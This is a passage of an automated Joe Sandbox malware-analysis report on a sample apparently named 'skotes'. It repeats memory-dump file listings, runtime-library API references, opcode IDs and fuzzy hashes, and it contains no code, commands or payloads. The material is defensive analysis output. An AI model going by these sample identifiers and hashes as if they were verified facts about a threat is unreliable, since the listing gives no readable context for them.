                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1997747980-0
                                                                                                                                            • Opcode ID: fca94072fbc5433b85bf2797d31200df9d8cd9928065a1a60ab479dccec29abc
                                                                                                                                            • Instruction ID: e7bd68da457ecd6d181a30d6b42c5a1e2ad8ee873a4ccbdebd13a14d85c427db
                                                                                                                                            • Opcode Fuzzy Hash: fca94072fbc5433b85bf2797d31200df9d8cd9928065a1a60ab479dccec29abc
                                                                                                                                            • Instruction Fuzzy Hash: AFC1DF719047099BDF24DFA4C945BAEBBF4AF05310F004A6FE81797791EB35AA08CB61
                                                                                                                                            APIs
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AE4538
                                                                                                                                            • ListArray.LIBCONCRT ref: 00AE456C
                                                                                                                                            • Hash.LIBCMT ref: 00AE45D5
                                                                                                                                            • Hash.LIBCMT ref: 00AE45E5
                                                                                                                                              • Part of subcall function 00AE9C41: std::bad_exception::bad_exception.LIBCMT ref: 00AE9C63
                                                                                                                                            • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00AE474B
                                                                                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00AE47A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3010677857-0
                                                                                                                                            • Opcode ID: d0ef69443bcc74a8f323b36aaba7b16b6ee06f2008ec731bfc0ae1b42bd4a3c7
                                                                                                                                            • Instruction ID: 4691c20b2c4005a7d57d79dae684bf984ca3d4abf05c41765a5a3e473dc343f6
                                                                                                                                            • Opcode Fuzzy Hash: d0ef69443bcc74a8f323b36aaba7b16b6ee06f2008ec731bfc0ae1b42bd4a3c7
                                                                                                                                            • Instruction Fuzzy Hash: 53816EB0A11B52BED708EF758945BDAFAACBF09700F10431BF52997281CBB4A520CBD1
                                                                                                                                            APIs
                                                                                                                                            • _SpinWait.LIBCONCRT ref: 00ADEEBC
                                                                                                                                            • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00ADEEC8
                                                                                                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00ADEEE1
                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00ADEF0F
                                                                                                                                            • Concurrency::Context::Block.LIBCONCRT ref: 00ADEF31
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1182035702-0
                                                                                                                                            • Opcode ID: f2b01e52424f9f3d8f85c0eadeafffad48c09eb76fa96d1365d4a43235daea60
                                                                                                                                            • Instruction ID: 9dc6ea5116870558ee3bd7bd97e1527b8c8bee318ac2bb2e77b680bbc43fa2d8
                                                                                                                                            • Opcode Fuzzy Hash: f2b01e52424f9f3d8f85c0eadeafffad48c09eb76fa96d1365d4a43235daea60
                                                                                                                                            • Instruction Fuzzy Hash: 18216070C142459EDF28EFA4C9556EEBBF0BF14320F60092BE153AA3D1EBB14A84CB50
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00AF1B57
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AF1B66
                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00AF1C2A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                            • String ID: pContext$switchState
                                                                                                                                            • API String ID: 2656283622-2660820399
                                                                                                                                            • Opcode ID: 37812f6a088942c2008b1ac261e63e88f9707333c8ef74b041d9164784fee50f
                                                                                                                                            • Instruction ID: 55a01ee87d87e4cb42cfb11ed5155fded07485b7e6149d0a0754b7848e0a0b2d
                                                                                                                                            • Opcode Fuzzy Hash: 37812f6a088942c2008b1ac261e63e88f9707333c8ef74b041d9164784fee50f
                                                                                                                                            • Instruction Fuzzy Hash: 0E31A435A00218DBCF14EFA4C9819BDB7B5AF54324F208565FA11A7291EB70ED02CA90
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
